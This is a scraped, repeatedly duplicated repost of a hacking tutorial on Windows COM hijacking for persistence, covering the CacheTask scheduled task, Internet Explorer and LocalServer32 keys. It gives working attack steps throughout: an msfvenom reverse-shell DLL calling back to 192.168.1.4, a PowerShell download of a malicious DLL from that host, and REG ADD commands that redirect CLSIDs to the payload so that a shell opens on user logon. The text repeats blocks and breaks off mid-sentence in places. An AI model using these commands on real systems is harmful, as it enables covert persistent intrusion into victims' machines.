Hacking Articles Tips Tricks Videos Tutorials
these steps: * Find hijackable keys in the registry. COM servers that have missing CLSIDs and don’t require elevated privileges (belonging to the HKEY_CURRENT_USER category) * Add a corresponding CLSID and strings referring to the application that had missing…
also has a great added module that can automatically identify scheduled tasks vulnerable to COM Hijacking which can give persistence to the system.
Get-ScheduledTaskComHandler -PersistenceLocations
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5m9TuKHvVzH-yquP1sModJfP8dM1LLiMmZVtRPY_jqjB5He9Nqno3A-FkjUfpzlsvImP6qMTiZuiCkfI-O7hIZv3-iwiag1Beb8cta7OwAxspl2c6NrU6fFTwXgVAB1l3DAZ1uESszXOK63sct3UlS4xwvsMb94ue3zdwL_o7SMyVN79ePPH5UPGt0w/s16000/9.png?w=640&ssl=1
Let’s pick a task called cache task which uses wininet.dll upon first time logon.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5VvDuhLEh9usfEI4WpFMY4BqZcbmYv-82599o90u3erZ7aHocsn7EAO_FNuzRXvbWmyRf1-5AxmcgPUVDov2EMYMemDtTvbPNKuIM63dk3c8z6PsJifqyg6wQj8NOIVGboRwSnbxIta0psgCzewxvhbkE6AEhaj_n9HO6g2u6rThCvn_w11z1H2bL6w/s16000/10.png?w=640&ssl=1
By default, all the tasks are configured in the folder %sysroot%\Tasks. The configuration file of this task is available at the location:
C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask which can be read using schtasks
schtasks /query /XML /TN “\Microsoft\Windows\Wininet\CacheTask”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh39U4Ai5M3gsgRlyfnF99eju4f758jQ_WGbfbEW6rOOCZXH2BZuwfeBJkB00vaf_y2mACJR561ixYJuBaJaUEyQI7RReS-BjU3Cy-m_4a54N_aDPN49suUpa3gaxf4_seTNc57F1L1f5tjnaFCpBx8dHuRj48DPSk1aJ29edzvFd-iq7S2dFFr01Cw/s16000/11.png?w=640&ssl=1
Here, we now have the CLSID of the COM object which calls wininet.dll. We can open the registry hives and confirm if this COM object is calling wininet.dll
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiONKbSJtxbORhn6TlU2gPllEqcqKfFMqyuUaGTkQsv2G9zg7rD1Cnaw-amb5iixGcVWf2Ud1tlX29S5Z0MrCD52zIwoA0Lkv0bUZR_yUr-961t09exShiOPpXRTjpjyeGaF_ghSn_LByklY8xnZo8jzbtRF_cxspKRiYD8cN8gBJzGOETqwYYxPSFKLA/s16000/12.png?w=640&ssl=1
Now that we have identified a target, let’s use this COM object to conduct hijacking. InProcServer32: CacheTask (Physical Access to Machine)InProcServer32: InProcServer32 key represents a path to a dynamic link library (DLL) implementation. Often used to represent DLL which is supposed to be run by a process.
In the enumeration above, we found out a COM object is vulnerable to hijacking. This registry exists in HKLM. As per the methodology, we need to create this same CLSID in HKCU (HKEY_CURRENT_USER) hive.
So, we open the registry hive and create this key
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\
Then we create one other key named:
{0358b920-0ac7-461f-98f4-58e32cd89148}
Again, right-click on this key and add a new subkey:
InProcServer32
Then under this, we create two strings, one with value: C:\users\Public\shell.dll and the other with the name “ThreadingModel” and value “Both”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpEukZCfqBCHpuZaMk7TWQPZXF5q2o416bL55yLvcFXocUkBVAVzNtbKUFMVW3LmymBV4a7XS6EjLitl1Zb8gRyiopIGg8t_r2yrg59WMxZl36Z94pUONUo2bhlqAn2mxA_kJGkBwAO6nyJjk3s7FbuRQgB0SAC9c8dYiXAZq5njo_KWzsxUKxvzvFnQ/s16000/13.png?w=640&ssl=1
Now, the path we just added doesn’t contain shell.dll. This is the code that will be executed when the user logs in. Let’s create a msfvenom DLL shell and upload it onto the victim system.
msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread lhost=192.168.1.4 lport=1337 -f dll > shell.dll
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0PeemyjpREZSytGsNgbozJHpfozIJFz_4lZaPZF6TvlEIprXt0mOEiGKw1G2yClmHzk1__9-S2pwnPDEDYMw3Wp5LCk8RnYRzlqY_wwtq_SkAvkQhPoEuoEIZYe1713PALFj487tXsNK5DXkP0DDmPeg0VeipSYknNQ3wso0SXmAUhS-vE44UxYvAvg/s16000/14.png?w=640&ssl=1
Now, upon restart and first logon by the user, we will receive a reverse shell like so:
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHzorCIAdM_fON9l1RpzTASMpbbwC489bSFjp38Wo6MZBkdoBFiworD3uAo_QiWJsjY5awCCDjvc4F4obu9JVM8p8iyVMx_DcvHjaEWOzc-fblsEmEZoRZnlm5ReUUQw-VYWoBR_UuMZUFNzZILmu_rDZ2D8Wy_rSaV5ats0v6b-b4tJ0gcF7tV4mJg/s16000/[...]
___________________________
@hacking_Attack
@Hacking_Video
Get-ScheduledTaskComHandler -PersistenceLocations
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5m9TuKHvVzH-yquP1sModJfP8dM1LLiMmZVtRPY_jqjB5He9Nqno3A-FkjUfpzlsvImP6qMTiZuiCkfI-O7hIZv3-iwiag1Beb8cta7OwAxspl2c6NrU6fFTwXgVAB1l3DAZ1uESszXOK63sct3UlS4xwvsMb94ue3zdwL_o7SMyVN79ePPH5UPGt0w/s16000/9.png?w=640&ssl=1
Let’s pick a task called cache task which uses wininet.dll upon first time logon.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5VvDuhLEh9usfEI4WpFMY4BqZcbmYv-82599o90u3erZ7aHocsn7EAO_FNuzRXvbWmyRf1-5AxmcgPUVDov2EMYMemDtTvbPNKuIM63dk3c8z6PsJifqyg6wQj8NOIVGboRwSnbxIta0psgCzewxvhbkE6AEhaj_n9HO6g2u6rThCvn_w11z1H2bL6w/s16000/10.png?w=640&ssl=1
By default, all the tasks are configured in the folder %sysroot%\Tasks. The configuration file of this task is available at the location:
C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask which can be read using schtasks
schtasks /query /XML /TN “\Microsoft\Windows\Wininet\CacheTask”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh39U4Ai5M3gsgRlyfnF99eju4f758jQ_WGbfbEW6rOOCZXH2BZuwfeBJkB00vaf_y2mACJR561ixYJuBaJaUEyQI7RReS-BjU3Cy-m_4a54N_aDPN49suUpa3gaxf4_seTNc57F1L1f5tjnaFCpBx8dHuRj48DPSk1aJ29edzvFd-iq7S2dFFr01Cw/s16000/11.png?w=640&ssl=1
Here, we now have the CLSID of the COM object which calls wininet.dll. We can open the registry hives and confirm if this COM object is calling wininet.dll
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiONKbSJtxbORhn6TlU2gPllEqcqKfFMqyuUaGTkQsv2G9zg7rD1Cnaw-amb5iixGcVWf2Ud1tlX29S5Z0MrCD52zIwoA0Lkv0bUZR_yUr-961t09exShiOPpXRTjpjyeGaF_ghSn_LByklY8xnZo8jzbtRF_cxspKRiYD8cN8gBJzGOETqwYYxPSFKLA/s16000/12.png?w=640&ssl=1
Now that we have identified a target, let’s use this COM object to conduct hijacking. InProcServer32: CacheTask (Physical Access to Machine)InProcServer32: InProcServer32 key represents a path to a dynamic link library (DLL) implementation. Often used to represent DLL which is supposed to be run by a process.
In the enumeration above, we found out a COM object is vulnerable to hijacking. This registry exists in HKLM. As per the methodology, we need to create this same CLSID in HKCU (HKEY_CURRENT_USER) hive.
So, we open the registry hive and create this key
HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\
Then we create one other key named:
{0358b920-0ac7-461f-98f4-58e32cd89148}
Again, right-click on this key and add a new subkey:
InProcServer32
Then under this, we create two strings, one with value: C:\users\Public\shell.dll and the other with the name “ThreadingModel” and value “Both”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpEukZCfqBCHpuZaMk7TWQPZXF5q2o416bL55yLvcFXocUkBVAVzNtbKUFMVW3LmymBV4a7XS6EjLitl1Zb8gRyiopIGg8t_r2yrg59WMxZl36Z94pUONUo2bhlqAn2mxA_kJGkBwAO6nyJjk3s7FbuRQgB0SAC9c8dYiXAZq5njo_KWzsxUKxvzvFnQ/s16000/13.png?w=640&ssl=1
Now, the path we just added doesn’t contain shell.dll. This is the code that will be executed when the user logs in. Let’s create a msfvenom DLL shell and upload it onto the victim system.
msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread lhost=192.168.1.4 lport=1337 -f dll > shell.dll
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0PeemyjpREZSytGsNgbozJHpfozIJFz_4lZaPZF6TvlEIprXt0mOEiGKw1G2yClmHzk1__9-S2pwnPDEDYMw3Wp5LCk8RnYRzlqY_wwtq_SkAvkQhPoEuoEIZYe1713PALFj487tXsNK5DXkP0DDmPeg0VeipSYknNQ3wso0SXmAUhS-vE44UxYvAvg/s16000/14.png?w=640&ssl=1
Now, upon restart and first logon by the user, we will receive a reverse shell like so:
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHzorCIAdM_fON9l1RpzTASMpbbwC489bSFjp38Wo6MZBkdoBFiworD3uAo_QiWJsjY5awCCDjvc4F4obu9JVM8p8iyVMx_DcvHjaEWOzc-fblsEmEZoRZnlm5ReUUQw-VYWoBR_UuMZUFNzZILmu_rDZ2D8Wy_rSaV5ats0v6b-b4tJ0gcF7tV4mJg/s16000/[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
also has a great added module that can automatically identify scheduled tasks vulnerable to COM Hijacking which can give persistence to the system. Get-ScheduledTaskComHandler -PersistenceLocations https://i0.wp.com/blogger.googleusercontent.com/img/b/R2…
15.png?w=640&ssl=1 InProcServer32: CacheTask (Remote Access to Machine)What we just did above can be done remotely as well. First, we need access to the victim’s powershell (which can be obtained by using Nishang) and then we will use the following code provided by bohops.com found here. To find COM keys vulnerable to hijacking which include InProcServer32 keys we do:
$inproc = gwmi Win32_COMSetting | ?{ $_.InprocServer32 -ne $null }
$paths = $inproc | ForEach {$_.InprocServer32}
foreach ($p in $paths){$p;cmd /c dir $p > $null}
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gmKKdkXxlX0ky-gCmfNNczksVXXzf4tlCNqaceQuzvgJOfrNLt-Rf0CxhYWrps0_PTvK679ImG8Y0rmcuXg_EflaFPEr4G7oE0h0IiaExumn3ESO32QMWwOPZu0-JbbX0AmaDxj-XXvGN-pHPfRnYy2yh8V9R9hxTL2P6UrO9rAGZdii8oCTdOMJgg/s16000/16.png?w=640&ssl=1
Similarly, these results can be stored in a text file using the code:
$inproc = gwmi Win32_COMSetting | ?{ $_.InprocServer32 -ne $null }
$inproc | ForEach {$_.InprocServer32} > ignite.txt
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUugW0XoU5eZZpMaw7c97i2RvkRP7OFn1Hct4UmlkO4nFcoy_X1B6B_ztCClrAXpk5f8tOryAKlpfRNGGJ0CcZFmXi2EoVMACAIt4Az7JYgloSgPmcCej_cuS2Y2EO3QPkOLcKKOzM8xBaU-hZ71mY_xGZmrRSyOC5KY8ITou_6pH7LtoQ91Rx67e3BA/s16000/17.png?w=640&ssl=1
In the enumeration and exploitation example above, we used CacheTask and overridden the wininet.dll by shell.dll
Upon searching wininet.dll in this text file, we see that it exists
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yjuONxnQRheYD8lrJR3xXv7bfpVycAtXQSPdkkPcTbkreVptI8UPJ30nieURmRL7eiZeNFRZ5kSlebAE4BHavYclfbO_3bjSBl-6Bl6V9vPAaNnkVMfvkfu_zNL0CX212lHwY_MstfvRgOtX-ME8xcHf9H2KnlajKIvm2Ofo8E-OCGvMJO3FN7RheA/s16000/18.png?w=640&ssl=1
We can view CacheTask’s configuration file like so:
cd C:\Windows\System32\Tasks\Microsoft\Windows\Wininet
type CacheTask
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij_z6DLrHt_9oEqraM682pjQ3HHdYtkUYTUxkVGC-i5TkAas3DAc_NDnl841FYvnPRgpkeuavGfL0s0Fh2F40fThoxBO7afLxsA1dmHh-o53MmNJOvaqouM81B__cEFv1rX1pdgqFTWnQhWQnwGFAMd1MMrw7YTX07qm8TZ3lBIAZWdqdssnq4BY1GJA/s16000/19.png?w=640&ssl=1
Now, we have obtained a CLSID. This exists in the HKLM hive. We need to create this in HKCU which can be done using the “reg add” command. And then, we can confirm if it got added using the reg query. Finally, to check if it works, we can restart it and wait for a user to logon
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 /t REG_SZ /d C:\Users\Public\shell.dll
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 /t REG_SZ /v ThreadingModel /d Both
REG QUERY HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
shutdown -r
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivP_aN6kXUOeW4IdCaMy-CBpZZCbqUIw6M-FJmkmoR40gwLFc6HISCK6h-FJSHMbD_4DGxjBmzIKSMtiTu7Gk41p3wEwLI41Hx5bsT-9hX0xjvSLYtJbr_pfHKWb57tzLTR0F_BthRjOXnS-V7mn07xgmQ5FCaCehyrex3TU5Yxy7CdO1Vh23sqh859Q/s16000/20.png?w=640&ssl=1
Now, when the system restarts and user Harshit logs in again, we will have a reverse shell confirming persistence has been achieved.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIJTNrosP_Fe5K-pP9roGH4kA5Wpu4cdrrF5hNcfQRCOMWC3CMXMxgqEdA2T0OqrCgyiFnVCLGhc2cYd5h9oCGwCaHdQFqC53bSFd2p1M5mipvA7Dd0SHTwJImN0w47IYNEtG-i1IjJgdBisi-A83cdFxxQRw8a0k1QIuCmJJ614ZHl-YWXZ9KAq6Xg/s16000/21.png?w=640&ssl=1 InProcServer32: Internet Explorer (Remote Access)GDATA provided this method of persistence in a post here. Internet Explorer is widely used in corporate even today. Upon reading its documentation, it was observed that IE uses the following DLL: api-ms-win-downlevel-1×64-l1-1-0._dl
IE’s CLSID exists in: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
This DLL doesn’t exist by default in the system, so, to do[...]
___________________________
@hacking_Attack
@Hacking_Video
$inproc = gwmi Win32_COMSetting | ?{ $_.InprocServer32 -ne $null }
$paths = $inproc | ForEach {$_.InprocServer32}
foreach ($p in $paths){$p;cmd /c dir $p > $null}
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8gmKKdkXxlX0ky-gCmfNNczksVXXzf4tlCNqaceQuzvgJOfrNLt-Rf0CxhYWrps0_PTvK679ImG8Y0rmcuXg_EflaFPEr4G7oE0h0IiaExumn3ESO32QMWwOPZu0-JbbX0AmaDxj-XXvGN-pHPfRnYy2yh8V9R9hxTL2P6UrO9rAGZdii8oCTdOMJgg/s16000/16.png?w=640&ssl=1
Similarly, these results can be stored in a text file using the code:
$inproc = gwmi Win32_COMSetting | ?{ $_.InprocServer32 -ne $null }
$inproc | ForEach {$_.InprocServer32} > ignite.txt
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUugW0XoU5eZZpMaw7c97i2RvkRP7OFn1Hct4UmlkO4nFcoy_X1B6B_ztCClrAXpk5f8tOryAKlpfRNGGJ0CcZFmXi2EoVMACAIt4Az7JYgloSgPmcCej_cuS2Y2EO3QPkOLcKKOzM8xBaU-hZ71mY_xGZmrRSyOC5KY8ITou_6pH7LtoQ91Rx67e3BA/s16000/17.png?w=640&ssl=1
In the enumeration and exploitation example above, we used CacheTask and overridden the wininet.dll by shell.dll
Upon searching wininet.dll in this text file, we see that it exists
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yjuONxnQRheYD8lrJR3xXv7bfpVycAtXQSPdkkPcTbkreVptI8UPJ30nieURmRL7eiZeNFRZ5kSlebAE4BHavYclfbO_3bjSBl-6Bl6V9vPAaNnkVMfvkfu_zNL0CX212lHwY_MstfvRgOtX-ME8xcHf9H2KnlajKIvm2Ofo8E-OCGvMJO3FN7RheA/s16000/18.png?w=640&ssl=1
We can view CacheTask’s configuration file like so:
cd C:\Windows\System32\Tasks\Microsoft\Windows\Wininet
type CacheTask
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij_z6DLrHt_9oEqraM682pjQ3HHdYtkUYTUxkVGC-i5TkAas3DAc_NDnl841FYvnPRgpkeuavGfL0s0Fh2F40fThoxBO7afLxsA1dmHh-o53MmNJOvaqouM81B__cEFv1rX1pdgqFTWnQhWQnwGFAMd1MMrw7YTX07qm8TZ3lBIAZWdqdssnq4BY1GJA/s16000/19.png?w=640&ssl=1
Now, we have obtained a CLSID. This exists in the HKLM hive. We need to create this in HKCU which can be done using the “reg add” command. And then, we can confirm if it got added using the reg query. Finally, to check if it works, we can restart it and wait for a user to logon
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 /t REG_SZ /d C:\Users\Public\shell.dll
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 /t REG_SZ /v ThreadingModel /d Both
REG QUERY HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
shutdown -r
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivP_aN6kXUOeW4IdCaMy-CBpZZCbqUIw6M-FJmkmoR40gwLFc6HISCK6h-FJSHMbD_4DGxjBmzIKSMtiTu7Gk41p3wEwLI41Hx5bsT-9hX0xjvSLYtJbr_pfHKWb57tzLTR0F_BthRjOXnS-V7mn07xgmQ5FCaCehyrex3TU5Yxy7CdO1Vh23sqh859Q/s16000/20.png?w=640&ssl=1
Now, when the system restarts and user Harshit logs in again, we will have a reverse shell confirming persistence has been achieved.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIJTNrosP_Fe5K-pP9roGH4kA5Wpu4cdrrF5hNcfQRCOMWC3CMXMxgqEdA2T0OqrCgyiFnVCLGhc2cYd5h9oCGwCaHdQFqC53bSFd2p1M5mipvA7Dd0SHTwJImN0w47IYNEtG-i1IjJgdBisi-A83cdFxxQRw8a0k1QIuCmJJ614ZHl-YWXZ9KAq6Xg/s16000/21.png?w=640&ssl=1 InProcServer32: Internet Explorer (Remote Access)GDATA provided this method of persistence in a post here. Internet Explorer is widely used in corporate even today. Upon reading its documentation, it was observed that IE uses the following DLL: api-ms-win-downlevel-1×64-l1-1-0._dl
IE’s CLSID exists in: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
This DLL doesn’t exist by default in the system, so, to do[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
15.png?w=640&ssl=1 InProcServer32: CacheTask (Remote Access to Machine)What we just did above can be done remotely as well. First, we need access to the victim’s powershell (which can be obtained by using Nishang) and then we will use the following code provided…
COM hijacking, we will create the following folder and add this DLL here.
C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
Now, to execute this attack, we need to override the IE CLSID by referring to that CLSID in HKCU hive as we did in the example above.
First, let’s create a new malicious DLL file and name it “api-ms-win-downlevel-1×64-l1-1-0._dl”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tQzPVE7Z3sTKTiwi--tO2kbHtT1kIA2ImSxgiWPnDiXyWgJmeAUDzZqgQ_iZzKQ8MxcKWmPEk81RF6aKX1ETDt5ombkPSUZt40XwFLn7-lmLzqGQDQ1mHU5ZXijfyPMpi7weWXQx4z4kx-XWnAcn-HRoQa3Hibe_TeXgzxuiHTMAgcutA2Ps43pjQQ/s16000/22.png?w=640&ssl=1
Now, we create the folder: C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
cd c:\users\harshit\appdata\roaming\microsoft
mkdir installer
cd installer
mkdir {BCDE0395-E52F-467C-8E3D-C4579291692E}
cd {BCDE0395-E52F-467C-8E3D-C4579291692E}
powershell wget 192.168.1.4/ api-ms-win-downlevel-1×64-l1-1-0._dl -O api-ms-win-downlevel-1×64-l1-1-0._dl
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE6RMSCLYoB7E6Aq5HViGPbaM5nGndaKLdNit_r2midqexgB-Eeaw-OISnD0Y-4Zrcu3gEtLirtbmo3PcWPw79BGZwMXe-0ch14gD5T6XondQK8nrouu3MXp4co2OVHZW1ZhuhYRjGQ_Hh__bUWQjiO8S7W3eOv9Qg4GnZ33KKAIB5Dw6RBCwH_D1mcA/s16000/23.png?w=640&ssl=1
Now, we will add the IE CLSID reference in HKCU.
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32 /t REG_SZ /d C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32 /t REG_SZ /v ThreadingModel /d Apartment
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi3xNeXUW7OJBfIp6IlofI8DtQaWfXuvjQR3_LWlVjsMVMEUEGHdAPBCRN0XYsuPgiKQS7Z9e_6kruHw-5ejmI7JgQpDb7gbz1PZKs9Tn1QbH4fU0HCxV7yJYBngvrIZOM-RDzPeVWE3SgKU2tBzDzyklC1s6p1X8Fic1KOLxmFQQkVONfDDtfRu0liA/s16000/24.png?w=640&ssl=1
Once the COM hijacking has been done, as soon as IE launches, we will receive a reverse shell!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitk7EN5YeHsEZOn8kzojjrwaeArDKm4_SgctM_9uN2bCzoyWAueR8LtD1xk6Mu7LBvpVn-Vn0dIFZN06UtiWKlETLRB5jlBk49iMrjjYyWt4rRG14Gu7MZdjOX6X5tLJEt7QWkSo5HDxj6pY174Ic6_o0qc7BR_ftDdkDzQGub8Bm5wZHOab8t2dUzAQ/s16000/25.png?w=640&ssl=1 LocalServer32: Remote Access to MachineThe LocalServer32 key represents a path to an executable (exe) implementation of a process, meaning that when an application is run, it refers to the COM keys and executes an EXE file.
To find all the hijackable localserver32 COM keys, the following procmon filters can be used:
* Operation is RegOpenKey Include
* Result is NAME NOT FOUND Include
* Path ends with LocalServer32 Include
* Path begins with HKLM Exclude
But since, we are using the remote machine, the following code can be used. The output result contains all the files that contain an empty reference to a file that doesn’t exist on the drive. As we can see, an interesting file has appeared. This file is called igniteserver.exe and refers to a World writable directory (/Users/Public). Means that an attacker can put his own malicious file on this directory with the name igniteserver.exe.
$inproc = gwmi Win32_COMSetting | ?{ $_.LocalServer32 -ne $null }
$inproc | ForEach {$_.LocalServer32} > ignite.txt
type ignite.txt
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTeSaN3hUUpoUF2JDwWg-bFNjnA-Qg_3umW_bxuciJNx2CVYtsJekteIT1uJsp8Sk4PmMJnzygD-GzQCekHCDopBppenVeZ1JC5qfcqx9rwAxXWZDyJhmhglDRYrjV7_3lNxmLzJ3n2tSz-owvfpsDZeeUl1ISY8LzUwuaWg87hjaDz4N-WVMeDEfXWQ/s16000/26.png?w=640&ssl=1
We can manually inspect other files too to see which files are vulnerable to COM hijacking and use SMB to copy malicious files with the same names on the directories.
Now, we need to obtain the CLSID of this exe. Thi[...]
___________________________
@hacking_Attack
@Hacking_Video
C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
Now, to execute this attack, we need to override the IE CLSID by referring to that CLSID in HKCU hive as we did in the example above.
First, let’s create a new malicious DLL file and name it “api-ms-win-downlevel-1×64-l1-1-0._dl”
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tQzPVE7Z3sTKTiwi--tO2kbHtT1kIA2ImSxgiWPnDiXyWgJmeAUDzZqgQ_iZzKQ8MxcKWmPEk81RF6aKX1ETDt5ombkPSUZt40XwFLn7-lmLzqGQDQ1mHU5ZXijfyPMpi7weWXQx4z4kx-XWnAcn-HRoQa3Hibe_TeXgzxuiHTMAgcutA2Ps43pjQQ/s16000/22.png?w=640&ssl=1
Now, we create the folder: C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
cd c:\users\harshit\appdata\roaming\microsoft
mkdir installer
cd installer
mkdir {BCDE0395-E52F-467C-8E3D-C4579291692E}
cd {BCDE0395-E52F-467C-8E3D-C4579291692E}
powershell wget 192.168.1.4/ api-ms-win-downlevel-1×64-l1-1-0._dl -O api-ms-win-downlevel-1×64-l1-1-0._dl
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE6RMSCLYoB7E6Aq5HViGPbaM5nGndaKLdNit_r2midqexgB-Eeaw-OISnD0Y-4Zrcu3gEtLirtbmo3PcWPw79BGZwMXe-0ch14gD5T6XondQK8nrouu3MXp4co2OVHZW1ZhuhYRjGQ_Hh__bUWQjiO8S7W3eOv9Qg4GnZ33KKAIB5Dw6RBCwH_D1mcA/s16000/23.png?w=640&ssl=1
Now, we will add the IE CLSID reference in HKCU.
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32 /t REG_SZ /d C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl
REG ADD HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InProcServer32 /t REG_SZ /v ThreadingModel /d Apartment
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi3xNeXUW7OJBfIp6IlofI8DtQaWfXuvjQR3_LWlVjsMVMEUEGHdAPBCRN0XYsuPgiKQS7Z9e_6kruHw-5ejmI7JgQpDb7gbz1PZKs9Tn1QbH4fU0HCxV7yJYBngvrIZOM-RDzPeVWE3SgKU2tBzDzyklC1s6p1X8Fic1KOLxmFQQkVONfDDtfRu0liA/s16000/24.png?w=640&ssl=1
Once the COM hijacking has been done, as soon as IE launches, we will receive a reverse shell!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitk7EN5YeHsEZOn8kzojjrwaeArDKm4_SgctM_9uN2bCzoyWAueR8LtD1xk6Mu7LBvpVn-Vn0dIFZN06UtiWKlETLRB5jlBk49iMrjjYyWt4rRG14Gu7MZdjOX6X5tLJEt7QWkSo5HDxj6pY174Ic6_o0qc7BR_ftDdkDzQGub8Bm5wZHOab8t2dUzAQ/s16000/25.png?w=640&ssl=1 LocalServer32: Remote Access to MachineThe LocalServer32 key represents a path to an executable (exe) implementation of a process, meaning that when an application is run, it refers to the COM keys and executes an EXE file.
To find all the hijackable localserver32 COM keys, the following procmon filters can be used:
* Operation is RegOpenKey Include
* Result is NAME NOT FOUND Include
* Path ends with LocalServer32 Include
* Path begins with HKLM Exclude
But since, we are using the remote machine, the following code can be used. The output result contains all the files that contain an empty reference to a file that doesn’t exist on the drive. As we can see, an interesting file has appeared. This file is called igniteserver.exe and refers to a World writable directory (/Users/Public). Means that an attacker can put his own malicious file on this directory with the name igniteserver.exe.
$inproc = gwmi Win32_COMSetting | ?{ $_.LocalServer32 -ne $null }
$inproc | ForEach {$_.LocalServer32} > ignite.txt
type ignite.txt
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTeSaN3hUUpoUF2JDwWg-bFNjnA-Qg_3umW_bxuciJNx2CVYtsJekteIT1uJsp8Sk4PmMJnzygD-GzQCekHCDopBppenVeZ1JC5qfcqx9rwAxXWZDyJhmhglDRYrjV7_3lNxmLzJ3n2tSz-owvfpsDZeeUl1ISY8LzUwuaWg87hjaDz4N-WVMeDEfXWQ/s16000/26.png?w=640&ssl=1
We can manually inspect other files too to see which files are vulnerable to COM hijacking and use SMB to copy malicious files with the same names on the directories.
Now, we need to obtain the CLSID of this exe. Thi[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
